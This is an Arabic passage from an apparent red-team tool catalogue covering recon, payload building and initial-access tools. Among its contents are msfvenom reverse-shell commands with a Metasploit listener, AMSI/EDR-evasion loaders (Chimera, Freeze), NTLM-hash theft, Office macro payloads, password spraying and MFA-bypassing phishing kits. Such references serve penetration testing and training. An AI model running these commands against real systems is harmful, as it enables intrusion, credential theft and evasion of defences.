### [🔙](#tool-list)[feroxbuster](https://github.com/epi052/feroxbuster)

أداة مصممة لتنفيذ التصفح القسري (Forced Browsing)، وهو هجوم يهدف إلى تعداد والوصول إلى الموارد التي لا تتم الإشارة إليها بواسطة تطبيق الويب، ولكنها لا تزال قابلة للوصول من قبل المهاجم.

يستخدم Feroxbuster القوة الغاشمة (brute force) مع قائمة كلمات للبحث عن محتوى غير مرتبط في الدلائل المستهدفة. قد تخزن هذه الموارد معلومات حساسة حول تطبيقات الويب والأنظمة التشغيلية، مثل كود المصدر، بيانات الاعتماد، عناوين الشبكة الداخلية، إلخ.

**التثبيت: (Kali)**```bash
sudo apt update && sudo apt install -y feroxbuster

تثبيت: (Mac)```bash curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh | bash

root@kitploit:~
**التثبيت: (Windows)**```bash
Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip
Expand-Archive .\feroxbuster.zip
.\feroxbuster\feroxbuster.exe -V

للحصول على تعليمات التثبيت الكاملة، انظر هنا.

الاستخدام:```bash

Add .pdf, .js, .html, .php, .txt, .json, and .docx to each url

./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx

Scan with headers

./feroxbuster -u http://127.1 -H Accept:application/json "Authorization: Bearer {token}"

Read URLs from stdin

cat targets | ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files

Proxy requests through burpsuite

./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080

root@kitploit:~
يمكن العثور على أمثلة الاستخدام الكاملة [هنا](https://epi052.github.io/feroxbuster-docs/docs/examples/).

![image](https://assets.kitploit.com/production/public/readmes/147/bddd1a012eb92f79a03b1f6dd3cb9f31a9b0751776541044adcf234332421a08.png)

*الصورة مأخوذة من https://raw.githubusercontent.com/epi052/feroxbuster/main/img/demo.gif*

### [🔙](#tool-list)[CloudBrute](https://github.com/0xsha/CloudBrute)

أداة للعثور على البنية التحتية للشركة (الهدف)، والملفات، والتطبيقات على أفضل مزودي الخدمات السحابية (أمازون، جوجل، مايكروسوفت، ديجيتال أوشن، علي بابا، فولتر، لينود).

الميزات:

- اكتشاف السحابة (واجهة برمجة تطبيقات IPINFO وكود المصدر)
- سريع (متزامن)
- متعدد المنصات (ويندوز، لينكس، ماك)
- توزيع عشوائي لوكيل المستخدم
- توزيع عشوائي للوكيل (HTTP، Socks5)

**التثبيت:** 

قم بتنزيل أحدث [إصدار](https://github.com/0xsha/CloudBrute/releases) لنظامك واتبع التعليمات الخاصة بالاستخدام.

**الاستخدام:**```bash
# Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt'
CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"

# Output results to file
CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt

image

الصورة مأخوذة من https://github.com/0xsha/CloudBrute

🔙dnsrecon

dnsrecon هي أداة بايثون لجرد سجلات DNS (MX, SOA, NS, A, AAAA, SPF و TXT) ويمكنها توفير عدد من المضيفين الضحايا المرتبطين الجدد للتنقل إليها من بحث نطاق واحد.

التثبيت:```bash sudo apt install dnsrecon

root@kitploit:~
**الاستخدام:**```bash
dnsrecon -d google.com

image

🔙shodan.io

يقوم Shodan بجرد البنية التحتية العامة وعرضها بتنسيق قابل للبحث. باستخدام اسم الشركة أو اسم النطاق أو عنوان IP، يمكن اكتشاف الأنظمة التي قد تكون ضعيفة والمرتبطة بهدفك عبر shodan.

image

🔙AORT

أداة لتعداد النطاقات الفرعية، تعداد DNS، كشف جدار الحماية (WAF)، WHOIS، فحص المنافذ، Wayback Machine، جمع البريد الإلكتروني.

التثبيت:```bash git clone https://github.com/D3Ext/AORT; cd AORT; pip3 install -r requirements.txt

root@kitploit:~
**الاستخدام:**```python
python3 AORT.py -d google.com

image

🔙spoofcheck

برنامج يتحقق مما إذا كان النطاق يمكن تزوير مصدره. يفحص البرنامج سجلات SPF و DMARC بحثًا عن إعدادات ضعيفة تسمح بالتزوير. بالإضافة إلى ذلك، سينبه إذا كان النطاق يحتوي على إعداد DMARC يرسل بريدًا أو طلبات HTTP عند فشل رسائل SPF/DKIM.

النطاقات قابلة للتزوير إذا تحقق أي من الشروط التالية:

  • عدم وجود سجل SPF أو DMARC
  • سجل SPF لا يحدد ~all أو -all
  • سياسة DMARC مضبوطة على p=none أو غير موجودة

التثبيت:```bash git clone https://github.com/BishopFox/spoofcheck; cd spoofcheck; pip install -r requirements.txt

root@kitploit:~
**الاستخدام:**```bash
./spoofcheck.py [DOMAIN]

image

🔙AWSBucketDump

AWSBucketDump هي أداة لسرد دلائل S3 الخاصة بخدمة AWS بسرعة بحثًا عن الملفات المثيرة للاهتمام. تشبه أداة تخمين النطاقات الفرعية ولكنها مصممة خصيصًا لدلائل S3، وتحتوي أيضًا على ميزات إضافية تسمح لك بالبحث في الملفات باستخدام grep وتنزيل الملفات المثيرة للاهتمام.

تثبيت:``` git clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt

root@kitploit:~
**الاستخدام:**```
usage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE]

optional arguments:
  -h, --help    show this help message and exit
  -D            Download files. This requires significant diskspace
  -d            If set to 1 or True, create directories for each host w/ results
  -t THREADS    number of threads
  -l HOSTLIST
  -g GREPWORDS  Provide a wordlist to grep for
  -m MAXSIZE    Maximum file size to download.

 python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1

🔙GitHarvester

أداة رائعة للعثور على معلومات من GitHub باستخدام regex، مع إمكانية البحث عن مستخدمين و/أو مشاريع محددة على GitHub.

التثبيت:``` git clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester

root@kitploit:~
**الاستخدام:**```
./githarvester.py

🔙truffleHog

TruffleHog هي أداة تقوم بمسح مستودعات git والبحث عن سلاسل عالية الإنتروبيا وأنماط قد تشير إلى وجود أسرار، مثل كلمات المرور ومفاتيح API. باستخدام TruffleHog، يمكنك بسرعة وسهولة العثور على معلومات حساسة قد تم ارتكابها ودفعها بطريق الخطأ إلى مستودع.

التثبيت (ثنائيات): رابط

التثبيت (Go):``` git clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install

root@kitploit:~
**الاستخدام:**```
trufflehog https://github.com/trufflesecurity/test_keys

image

🔙Dismap

Dismap هي أداة لاكتشاف وتحديد الأصول. يمكنها التعرف بسرعة على البروتوكولات ومعلومات البصمات مثل web/tcp/udp، وتحديد أنواع الأصول، وهي مناسبة للشبكات الداخلية والخارجية.

تمتلك Dismap قاعدة بصمات كاملة، تتضمن حالياً بصمات بروتوكولات tcp/udp/tls وأكثر من 4500 قاعدة بصمة ويب، يمكنها التعرف على favicon و body و header وغيرها.

التثبيت:

Dismap هو ملف ثنائي لأنظمة Linux و MacOS و Windows. اذهب إلى Release لتنزيل الإصدار المناسب لتشغيله:```bash

Linux or MacOS

chmod +x dismap-0.3-linux-amd64 ./dismap-0.3-linux-amd64 -h

Windows

dismap-0.3-windows-amd64.exe -h

root@kitploit:~
**الاستخدام:**```bash
# Scan 192.168.1.1 subnet
./dismap -i 192.168.1.1/24

# Scan, output to result.txt and json output to result.json
./dismap -i 192.168.1.1/24 -o result.txt -j result.json

# Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds
./dismap -i 192.168.1.1/24 --np --timeout 10

# Scan, Number of concurrent threads 1000
./dismap -i 192.168.1.1/24 -t 1000

image

الصورة مستخدمة من https://github.com/zhzyker/dismap

🔙enum4linux

أداة لتعداد المعلومات من أنظمة Windows و Samba.

يمكن استخدامها لجمع مجموعة واسعة من المعلومات، بما في ذلك:

  • معلومات النطاق ووحدة تحكم النطاق
  • معلومات المستخدمين والمجموعات المحلية
  • المشاركات وصلاحيات المشاركة
  • سياسات الأمان
  • معلومات Active Directory

التثبيت: (Apt)```bash sudo apt install enum4linux

root@kitploit:~
**التثبيت: (Git)**```bash
git clone https://github.com/CiscoCXSecurity/enum4linux
cd enum4linux

الاستخدام:```bash

'Do everything'

enum4linux.pl -a 192.168.2.55

Obtain list of usernames (RestrictAnonymous = 0)

enum4linux.pl -U 192.168.2.55

Obtain list of usernames (using authentication)

enum4linux.pl -u administrator -p password -U 192.168.2.55

Get a list of groups and their members

enum4linux.pl -G 192.168.2.55

Verbose scan

enum4linux.pl -v 192.168.2.55

root@kitploit:~
يمكن العثور على معلومات الاستخدام الكاملة في [هذه المدونة](https://labs.portcullis.co.uk/tools/enum4linux/).

![image](https://assets.kitploit.com/production/public/readmes/147/fe00ba9f2f4658aa8611e2deabd598ed9ded034e10dca68bc7ebfcb901597d8d.png)

*الصورة مأخوذة من https://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/*

### [🔙](#tool-list)[skanuvaty](https://github.com/Esc4iCEscEsc/skanuvaty)

ماسح سريع وخطير لـ dns/الشبكة/المنافذ، من إنشاء [Esc4iCEscEsc](https://github.com/Esc4iCEscEsc)، مكتوب بلغة rust.

ستحتاج إلى ملف نطاقات فرعية. *مثال: [قائمة كلمات النطاقات الفرعية من Sublist3r](https://raw.githubusercontent.com/aboul3la/Sublist3r/master/subbrute/names.txt)*.

**التثبيت:**

قم بتنزيل أحدث إصدار من [هنا](https://github.com/Esc4iCEscEsc/skanuvaty/releases).```bash
# Install a wordlist
sudo apt install wordlists
ls /usr/share/dirb/wordlists
ls /usr/share/amass/wordlists

الاستخدام:```bash skanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt

root@kitploit:~
![صورة](https://assets.kitploit.com/production/public/readmes/147/a12af6eef4cb46b200b8d1ea7e42ad172285a5263ce609aff1902ead120ec20d.png)

*الصورة مستخدمة من https://github.com/Esc4iCEscEsc/skanuvaty*

### [🔙](#tool-list)[Metabigor](https://github.com/j3ssie/metabigor)

Metabigor هي أداة استخباراتية، هدفها القيام بمهام OSINT وأكثر ولكن بدون أي مفتاح API.

**الميزات الرئيسية:**

- البحث عن معلومات حول عنوان IP و ASN والمنظمة.
- غلاف (Wrapper) لتشغيل rustscan و masscan و nmap بكفاءة أكبر على IP/CIDR.
- إيجاد المزيد من المجالات المرتبطة بالهدف من خلال تطبيق تقنيات مختلفة (الشهادة، whois، Google Analytics، إلخ).
- الحصول على ملخص حول عنوان IP (مدعوم من [@thebl4ckturtle](https://github.com/theblackturtle))

**التثبيت:**```bash
go install github.com/j3ssie/metabigor@latest

الاستخدام:```bash

discovery IP of a company/organization

echo "company" | metabigor net --org -o /tmp/result.txt

Getting more related domains by searching for certificate info

echo 'Target Inc' | metabigor cert --json | jq -r '.Domain' | unfurl format %r.%t | sort -u # this is old command

Only run rustscan with full ports

echo '1.2.3.4/24' | metabigor scan -o result.txt

Reverse Whois to find related domains

echo 'example.com' | metabigor related -s 'whois'

Get Google Analytics ID directly from the URL

echo 'https://example.com' | metabigor related -s 'google-analytic'

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/55dd22bbf9b6790285f8373fe31c699f489c60f4541a6223af9b7cd77faf5a61.png)

*الصورة مستخدمة من https://github.com/j3ssie/metabigor*

### [🔙](#tool-list)[Gitrob](https://github.com/michenriksen/gitrob)

Gitrob هي أداة تساعد في العثور على الملفات الحساسة المحتملة التي تم دفعها إلى المستودعات العامة على Github.

ستقوم Gitrob باستنساخ المستودعات التي تنتمي إلى مستخدم أو مؤسسة إلى عمق قابل للتكوين، وتتكرار عبر تاريخ الالتزامات ووضع علامات على الملفات التي تطابق التوقيعات الخاصة بالملفات الحساسة المحتملة.

سيتم عرض النتائج من خلال واجهة ويب لسهولة التصفح والتحليل.

**ملاحظة:** *ستحتاج Gitrob إلى رمز وصول Github للتفاعل مع واجهة برمجة تطبيقات Github. [أنشئ رمز وصول شخصي](https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/) واحفظه في متغير بيئة في ملف .bashrc أو ملف تهيئة شل مشابه:*```bash
export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef

تثبيت: (Go)```bash go get github.com/michenriksen/gitrob

root@kitploit:~
**تثبيت: (Binary)** 

إصدار [مجمّع مسبقًا](https://github.com/michenriksen/gitrob/releases) متاح لكل إصدار.

**الاستخدام:**```bash
# Run against org
gitrob {org_name}

# Saving session to a file
gitrob -save ~/gitrob-session.json acmecorp

# Loading session from a file
gitrob -load ~/gitrob-session.json

image

الصورة مستخدمة من https://www.uedbox.com/post/58828/

🔙gowitness

Gowitness هي أداة لالتقاط لقطات شاشة لمواقع الويب مكتوبة بلغة Golang، تستخدم Chrome Headless لإنشاء لقطات شاشة لواجهات الويب من خلال سطر الأوامر، مع عارض تقارير مفيد لمعالجة النتائج. يتم دعم كل من Linux وmacOS، مع دعم Windows بشكل شبه كامل.

تثبيت: (Go)```bash go install github.com/sensepost/gowitness@latest

root@kitploit:~
يمكن العثور على معلومات التثبيت الكاملة [هنا](https://github.com/sensepost/gowitness/wiki/Installation).

**الاستخدام:**```bash
# Screenshot a single website
gowitness single https://www.google.com/

# Screenshot a cidr using 20 threads
gowitness scan --cidr 192.168.0.0/24 --threads 20

# Screenshot open http services from an namp file
gowitness nmap -f nmap.xml --open --service-contains http

# Run the report server
gowitness report serve

يمكن العثور على معلومات الاستخدام الكاملة هنا.

image

الصورة مستخدمة من https://github.com/sensepost/gowitness

تطوير الموارد

🔙remoteInjector

يقوم بحقن رابط إلى قالب Word عن بعد في مستند Word.

هذه الأداة المبنية على بايثون تقوم بتعديل رابط settings.xml.rels في ملف .docx ليشير إلى قالب .dotm مستضاف عن بعد يحتوي على ماكرو VBA، ويتم تنفيذه عند فتح المستند وتفعيل وحدات الماكرو.

منشور مدونة ذو صلة

التثبيت:```bash git clone https://github.com/JohnWoodman/remoteinjector;cd remoteinjector

root@kitploit:~
**الاستخدام:**```bash
python3 remoteinjector.py -w https://example.com/template.dotm example.docx

🔙Chimera

Chimera هو سكريبت تشفير PowerShell مصمم لتجاوز AMSI وحلول مكافحة الفيروسات. يقوم بتحليل ملفات PS1 الضارة المعروفة بإثارة برامج مكافحة الفيروسات ويستخدم استبدال السلاسل وربط المتغيرات لتجنب تواقيع الكشف الشائعة.

التثبيت:```bash sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git sudo git clone https://github.com/tokyoneon/chimera /opt/chimera sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/ sudo chmod +x chimera.sh; ./chimera.sh --help

root@kitploit:~
**الاستخدام:**```bash
./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\
copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\
invoke-expression,out-string,write-error -j -g -k -r -p

image

🔙msfvenom

تتيح أداة Msfvenom إنشاء الحمولات (payloads) لمجموعة متنوعة من أنظمة التشغيل وبتنسيقات عديدة. كما تدعم إخفاء الحمولات لتجاوز برامج مكافحة الفيروسات.

إعداد المستمع```shell use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST your-ip set LPORT listening-port run

root@kitploit:~
#### أوامر Msfvenom

**PHP:**```bash
msfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R

ويندوز:```bash msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > shell-x86.exe

root@kitploit:~
**Linux:**```bash
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf

Java:```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

root@kitploit:~
**HTA:**```bash
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta

صورة

🔙Shellter

Shellter هي أداة حقن شيلكود ديناميكية، وأول أداة إصابة حقيقية للملفات التنفيذية (PE) ديناميكية على الإطلاق.

يمكن استخدامها لحقن الشيلكود في تطبيقات ويندوز الأصلية (حاليًا تطبيقات 32 بت فقط).

تستفيد Shellter من البنية الأصلية لملف PE ولا تطبق أي تعديلات مثل تغيير أذونات الوصول للذاكرة في الأقسام (إلا إذا أراد المستخدم)، أو إضافة قسم إضافي بصلاحية RWE، أو أي شيء قد يبدو مريبًا أثناء فحص برامج مكافحة الفيروسات.

يمكن العثور على معلومات README الكاملة هنا.

التثبيت: (Kali)```bash apt-get update apt-get install shellter

root@kitploit:~
**تثبيت: (ويندوز)**

قم بزيارة [صفحة التحميل](https://www.shellterproject.com/download/) وقم بالتثبيت.

**الاستخدام:**

ما عليك سوى اختيار ملف ثنائي شرعي لاختراقه وتشغيل Shellter.

يمكن العثور على بعض النصائح المفيدة [هنا](https://www.shellterproject.com/tipstricks/).

يمكن العثور على الكثير من عروض توضيحية من المجتمع [هنا](https://www.shellterproject.com/shellter-community-demos/).

![image](https://assets.kitploit.com/production/public/readmes/147/04c2d11a2a571a26ec7c16cff3fb5d9298164340e32e8efd8ee3f8baac079ef6.png)

*الصورة مأخوذة من https://www.kali.org/tools/shellter/images/shellter.png*

### [🔙](#tool-list)[Freeze](https://github.com/optiv/Freeze)

Freeze هي أداة إنشاء حمولات تُستخدم لتجاوز ضوابط أمان EDR لتنفيذ شيل كود بطريقة متخفية.

تستخدم Freeze تقنيات متعددة ليس فقط لإزالة روابط EDR الخاصة بالمستخدم، ولكن أيضًا لتنفيذ شيل كود بطريقة تتجاوز ضوابط المراقبة الأخرى لنقاط النهاية.

**تثبيت:**```bash
git clone https://github.com/optiv/Freeze
cd Freeze
go build Freeze.go

الاستخدام:``` -I string Path to the raw 64-bit shellcode. -O string Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe. -console Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature. -encrypt Encrypts the shellcode using AES 256 encryption -export string For DLL Loaders Only - Specify a specific Export function for a loader to have. -process string The name of process to spawn. This process has to exist in C:\Windows\System32. Example 'notepad.exe' (default "notepad.exe") -sandbox Enables sandbox evasion by checking: Is Endpoint joined to a domain? Does the Endpoint have more than 2 CPUs? Does the Endpoint have more than 4 gigs of RAM? -sha256 Provides the SHA256 value of the loaders (This is useful for tracking)

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/6c3f90681a6549cbc77c48fc0ced412b27f85d65b44c0cf32224d245ae1c994c.png)

*الصورة مستخدمة من https://www.blackhatethicalhacking.com/tools/freeze/*

### [🔙](#tool-list)[WordSteal](https://github.com/0x09AL/WordSteal)

سينشئ هذا السكريبت مستند Microsoft Word يحتوي على صورة عن بُعد، مما يسمح بالتقاط تجزئات NTML من نقطة نهاية الضحية عن بُعد.

يمتلك Microsoft Word القدرة على تضمين الصور من المواقع البعيدة، بما في ذلك صورة بعيدة مستضافة على خادم SMB يتحكم فيه المهاجم. يمنحك هذا الفرصة للاستماع إلى تجزئات NTLM التي تُرسل عند فتح الضحية المُوثَّقة للمستند وعرض الصورة. 

**تثبيت:**```
git clone https://github.com/0x09AL/WordSteal
cd WordSteal

الاستخدام:```bash

Generate document containing 'test.jpg' and start listener

./main.py 127.0.0.1 test.jpg 1

Generate document containing 'test.jpg' and do not start listener

./main.py 127.0.0.1 test.jpg 0\n

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/a2683bdc376d7179fc8500aa2cf1636e371e52129800bf51c15b79c364391fbd.png)

*الصورة مأخوذة من https://pentestit.com/wordsteal-steal-ntlm-hashes-remotely/*

### [🔙](#tool-list)[وظائف NTAPI غير الموثقة](http://undocumented.ntinternals.net/)

يقدم هذا الموقع معلومات عن الأجزاء الداخلية غير الموثقة لنظام ويندوز، واستدعاءات النظام، وهياكل البيانات، والتفاصيل المنخفضة المستوى الأخرى لنظام تشغيل ويندوز.

يمكن أن يكون موردًا قيمًا للأفراد الذين يرغبون في استكشاف الأجزاء الداخلية لويندوز لأغراض متنوعة، بما في ذلك تحليل الثغرات، تطوير الاستغلالات، ورفع الامتيازات.

عند تطوير الاستغلالات، فإن فهم الأجزاء الداخلية للنظام المستهدف أمر بالغ الأهمية. يمكن أن يساعد هذا الموقع في تطوير الاستغلالات من خلال الاستفادة من الجوانب غير الموثقة منخفضة المستوى لويندوز.

**الاستخدام:**

قم بزيارة [http://undocumented.ntinternals.net/](http://undocumented.ntinternals.net/)

![image](https://assets.kitploit.com/production/public/readmes/147/3c88e47b3afc58cee00fe06443626d0ac8354195bf3988c973cfeefdce21d197.png)

*الصورة مأخوذة من http://undocumented.ntinternals.net/*

### [🔙](#tool-list)[وظائف استرجاع النواة](https://codemachine.com/articles/kernel_callback_functions.html)

تقدم هذه المذكرة التقنية قائمة شاملة بجميع واجهات برمجة التطبيقات التي يصدرها نواة ويندوز، لكتابة برامج التشغيل لتسجيل وظائف الاسترجاع التي تستدعيها مكونات النواة في ظروف مختلفة.

معظم هذه الإجراءات موثقة في حزمة تشغيل ويندوز (WDK) ولكن بعضها مخصص للاستخدام بواسطة برامج التشغيل المضمنة.

يتم وصف الوظائف غير الموثقة بإيجاز بينما يتم إدراج الوظائف الموثقة هنا للإشارة فقط.

**الاستخدام:**

قم بزيارة [https://codemachine.com/articles/kernel_callback_functions.html](https://codemachine.com/articles/kernel_callback_functions.html)

![image](https://assets.kitploit.com/production/public/readmes/147/ccdbb9756a5efe851f7366430ee13b1e380ba5a8a3be2e71d93788f7c71f32f7.png)

*الصورة مأخوذة من https://codemachine.com*

### [🔙](#tool-list)[OffensiveVBA](https://github.com/S3cur3Th1sSh1t/OffensiveVBA)

مجموعة من التقنيات الهجومية، والنصوص، والروابط المفيدة لتحقيق تنفيذ الأكواد وتجنب الدفاعات عبر ماكروات الأوفيس.

**الاستخدام:**

قم بزيارة [https://github.com/S3cur3Th1sSh1t/OffensiveVBA#templates-in-this-repo](https://github.com/S3cur3Th1sSh1t/OffensiveVBA#templates-in-this-repo)

![image](https://assets.kitploit.com/production/public/readmes/147/a1e2be51d71eb16d0dc2e331e56089899a00da59681226f64a584c249bbde6fd.png)

*الصورة مأخوذة من https://github.com/S3cur3Th1sSh1t*

### [🔙](#tool-list)WSH

**إنشاء الحمولة:**```vbs
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True

تنفيذ:```bash wscript payload.vbs cscript.exe payload.vbs wscript /e:VBScript payload.txt //If .vbs files are blacklisted

root@kitploit:~
### [🔙](#tool-list)HTA

**إنشاء الحمولة:**```html
<html>
<body>
<script>
	var c= 'cmd.exe'
	new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>

تنفيذ: تشغيل الملف

🔙VBA

إنشاء الحمولة:```python Sub calc() Dim payload As String payload = "calc.exe" CreateObject("Wscript.Shell").Run payload,0 End Sub

root@kitploit:~
**تنفيذ:** تعيين الدالة إلى Auto_Open() في مستند ممكّن بماكرو

الوصول الأولي
====================

### [🔙](#tool-list)[CredMaster](https://github.com/knavesec/CredMaster)

قم بتشغيل هجوم رش كلمة المرور / القوة العمياء عبر وكلاء تمرير Amazon AWS، مع تغيير عنوان IP الطالب لكل محاولة مصادقة. يؤدي ذلك إلى إنشاء واجهات برمجة تطبيقات FireProx ديناميكيًا لرش كلمات مرور أكثر تمويًا.

يوفر CredMaster طريقة لتشغيل رش كلمات مرور مجهولة ضد نقاط النهاية في أداة بسيطة وسهلة الاستخدام. توفر أداة FireProx عنوان IP الطالب المتناوب، بينما يقوم أساس CredMaster بتزوير جميع المعلومات التعريفية الأخرى.

الميزات:
- دعم كامل لجميع مناطق AWS
- إنشاء واجهات برمجة تطبيقات تلقائيًا لتمرير الوكيل
- تزوير أرقام تتبع API، وعناوين IP المرسلة، ورؤوس تتبع الوكيل الأخرى
- معالجة متعددة الخيوط
- عدادات تأخير كلمة المرور وتكوين لتجنب سياسات القفل
- إضافة إضافات جديدة بسهولة
- مجهول تمامًا

**التثبيت:**```bash
git clone https://github.com/knavesec/CredMaster;cd CredMaster;pip install -r requirements.txt

للحصول على تعليمات التثبيت الكاملة انظر هنا.

الاستخدام:```bash python3 credmaster.py --plugin {pluginname} --access_key {key} --secret_access_key {key} -u userfile -p passwordfile -a useragentfile {otherargs} python3 credmaster.py --config config.json

root@kitploit:~
هذه الأداة تتطلب مفاتيح وصول API لأمازون، دليل حول كيفية الحصول على هذه المفاتيح موجود هنا: https://bond-o.medium.com/aws-pass-through-proxy-84f1f7fa4b4b

![credmaster](https://assets.kitploit.com/production/public/readmes/147/0b3b39000bca40b701781836c94d98cc1efa1c23783a2344bfbf30fde4293d4a.png)

*الصورة المستخدمة من https://github.com/knavesec/CredMaster/wiki*

### [🔙](#tool-list)[TREVORspray](https://github.com/blacklanternsecurity/TREVORspray)

TREVORspray هي أداة رش كلمات مرور معيارية مع خيوط معالجة، وكالة SSH، وحدات نهب، والمزيد!

**التثبيت:**```bash
pip install https://github.com/blacklanternsecurity/TREVORspray

الاستخدام:```bash

Recon

python3 ./trevorspray --recon evilcorp.com

Enumerate users via OneDrive

python3 ./trevorspray --recon evilcorp.com -u emails.txt --threads 10

Spray against discovered

python3 ./trevorspray -u emails.txt -p 'Welcome123' --url https://login.windows.net/b43asdas-cdde-bse-ac05-2e37deadbeef/oauth2/token

root@kitploit:~
للحصول على تعليمات الاستخدام الكاملة، انظر [here](https://github.com/blacklanternsecurity/TREVORspray?tab=readme-ov-file#how-to---o365).

![TREVORspray](https://assets.kitploit.com/production/public/readmes/147/7663363d4be94c22481a92a86f36f1777a8f9c4d85ad76ca3df5ee09096deb09.png)

*الصورة مأخوذة من https://github.com/blacklanternsecurity/TREVORspray*

### [🔙](#tool-list)[evilqr](https://github.com/kgretzky/evilqr)

مجموعة أدوات توضح نهجًا آخر لهجوم QRLJacking، مما يسمح بتنفيذ استيلاء على الحساب عن بُعد، عبر التصيد باستخدام رمز QR لتسجيل الدخول.

يتكون من إضافة متصفح يستخدمها المهاجم لاستخراج رمز QR لتسجيل الدخول، وتطبيق خادم يقوم بجلب رموز QR لتسجيل الدخول لعرضها على صفحات التصيد المستضافة.

عرض توضيحي [video](https://www.youtube.com/watch?v=8pfodWzqMcU)

**التثبيت: (الإضافة)** 

يمكنك تحميل الإضافة في Chrome، عبر ميزة `Load unpacked`:
https://developer.chrome.com/docs/extensions/mv3/getstarted/development-basics/#load-unpacked

بمجرد تثبيت الإضافة، تأكد من تثبيت أيقونتها في شريط أدوات الإضافات في Chrome، بحيث تكون الأيقونة مرئية دائمًا.

**التثبيت: (الخادم)**```bash
git clone https://github.com/kgretzky/evilqr;cd evilqr/server/;build_run.bat

الاستخدام:

  1. قم بتشغيل الخادم عن طريق تشغيل ملف الخادم المُجمّع الثنائي: ./server/build/evilqr-server
  2. افتح أيًا من المواقع المدعومة في متصفح Chrome، مع تثبيت إضافة Evil QR:``` https://discord.com/login https://web.telegram.org/k/ https://whatsapp.com https://store.steampowered.com/login/ https://accounts.binance.com/en/login https://www.tiktok.com/login
root@kitploit:~
3. تأكد من أن رمز QR لتسجيل الدخول مرئي، ثم انقر على أيقونة الإضافة **Evil QR** في شريط الأدوات. إذا تم التعرف على رمز QR، يجب أن تضيء الأيقونة بالألوان.
4. افتح عنوان URL لصفحة التصيد الخاصة بالخادم: `http://127.0.0.1:35000` (الافتراضي)

![evilqr](https://assets.kitploit.com/production/public/readmes/147/f8ff7150038690a1c6608be4071593f736ccb4369d43ebc0af44791c020e2b15.png)

*الصورة من https://breakdev.org/evilqr-phishing/*

### [🔙](#tool-list)[CUPP](https://github.com/Mebus/cupp)

الشكل الأكثر شيوعًا للمصادقة هو الجمع بين اسم المستخدم وكلمة المرور أو عبارة المرور. يمكن أحيانًا تخمين كلمات المرور من خلال تمييز المستخدم، مثل تاريخ الميلاد، أو اللقب، أو العنوان، أو اسم حيوان أليف أو قريب، أو كلمة شائعة مثل God، love، money أو password.

لهذا السبب وُلدت CUPP.

**التثبيت:**```bash
git clone https://github.com/Mebus/cupp;cd cupp

الاستخدام:```bash

Run in interactive mode

python3 ./cupp.py -i

root@kitploit:~
![cupp](https://assets.kitploit.com/production/public/readmes/147/1c9d63a8d34972498c7a267463fc4233869f68059aee885a2b88ce276cfffffb.png)

*الصورة مأخوذة من https://github.com/Mebus/cupp*

### [🔙](#tool-list)[Bash Bunny](https://shop.hak5.org/products/bash-bunny)

Bash Bunny هو أداة هجومية فيزيائية عبر USB ونظام توصيل حمولات متعددة الوظائف. صُمم ليكون موصلاً بمنفذ USB للحاسوب ويمكن برمجته لأداء مجموعة متنوعة من الوظائف، بما في ذلك معالجة البيانات واستخراجها، وتثبيت البرامج الضارة، وتجاوز الإجراءات الأمنية.

[hackinglab: Bash Bunny – Guide](https://hackinglab.cz/en/blog/bash-bunny-guide/)

[Hak5 Documentation](https://docs.hak5.org/bash-bunny/)

[Nice Payload Repo](https://github.com/hak5/bashbunny-payloads)

[صفحة المنتج](https://hak5.org/products/bash-bunny)

![image](https://assets.kitploit.com/production/public/readmes/147/a9fc36ccc8742ad176a0455fea6a50a355f6a873f99ab472c3b81989c3093b66.png)

### [🔙](#tool-list)[EvilGoPhish](https://github.com/fin3ss3g0d/evilgophish)

evilginx2 + gophish. (GoPhish) Gophish هو إطار عمل تصيد قوي ومفتوح المصدر يسهل اختبار مدى تعرض مؤسستك للتصيد. (evilginx2) إطار عمل مستقل للهجوم الوسيط (Man-in-the-Middle) يُستخدم لتصيد بيانات تسجيل الدخول مع ملفات تعريف الارتباط للجلسات، مما يسمح بتجاوز المصادقة الثنائية.

